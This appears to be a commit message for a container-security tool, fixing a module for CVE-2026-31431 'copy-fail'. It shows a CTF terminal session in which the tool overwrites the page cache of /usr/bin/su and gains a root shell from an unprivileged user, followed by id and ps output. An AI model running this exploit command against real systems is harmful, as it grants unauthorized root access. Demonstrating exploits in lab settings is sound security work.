fix: CVE-2026-31431 copy-fail (non-root→root & x86_64 only)

[neargle]

pseudo@ctf-copy-fail-simple-cdk:/$ whoami
pseudo
pseudo@ctf-copy-fail-simple-cdk:/$ ls
bin  boot  dev  etc  home  lib  lib64  media  mnt  opt  proc  root  run  sbin  srv  sys  tmp  usr  var
pseudo@ctf-copy-fail-simple-cdk:/$ /home/pseudo/copy-fail-ctf/cdk-fixed run copy-fail-cve-2026-31431
2026/04/30 15:31:49 [*] CVE-2026-31431 copy-fail exploit targeting /usr/bin/su
2026/04/30 15:31:49 [*] NOTE: This exploit performs local privilege escalation (non-root → root) inside the container only. It does NOT escape the container.
2026/04/30 15:31:49 [+] Injecting 160 bytes into page cache of /usr/bin/su
2026/04/30 15:31:49 [+] Page cache overwrite complete. Executing target binary for root shell...
# id
uid=0(root) gid=1001(pseudo) groups=1001(pseudo)
# ps aux
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.0   2696  1408 ?        Ss   15:30   0:00 sleep infinity
pseudo         7  0.0  0.0   4588  3968 pts/0    Ss   15:31   0:00 bash
pseudo        17  0.0  0.1 1235420 10104 pts/0   Sl   15:31   0:00 /home/pseudo/copy-fail-ctf/cdk-fixed run copy-fail-cve-2026-31431
root          23  0.0  0.0   2800  1792 pts/0    S    15:31   0:00 ?
root          25  0.0  0.0   7888  4224 pts/0    R+   15:32   0:00 ps aux